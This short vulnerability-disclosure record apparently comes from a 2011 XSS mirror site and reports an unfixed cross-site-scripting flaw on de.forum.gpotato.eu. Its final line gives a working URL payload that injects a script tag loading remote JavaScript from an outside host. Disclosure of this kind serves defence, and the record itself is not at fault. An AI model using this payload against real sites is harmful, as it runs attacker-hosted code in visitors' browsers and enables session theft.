Security researcher crucki, has submitted on 28/12/2011 a cross-site-scripting (XSS) vulnerability affecting de.forum.gpotato.eu, which at the time of submission ranked 12089 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 28/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Vulnerable URL: http://de.forum.gpotato.eu/Common/Aspx/ImageUpload/ImageUploadType1.asp?FCD=%22%3E%3Cscript%3Es=%22http://ompldr.org/vYnhqbw%22;r=%22\40%22;document.write%28%27%3Cscript%27+r+%27src%27+%27=%27+s+%27%3E\%3C\/script\%3E%27%29%3C/script%3E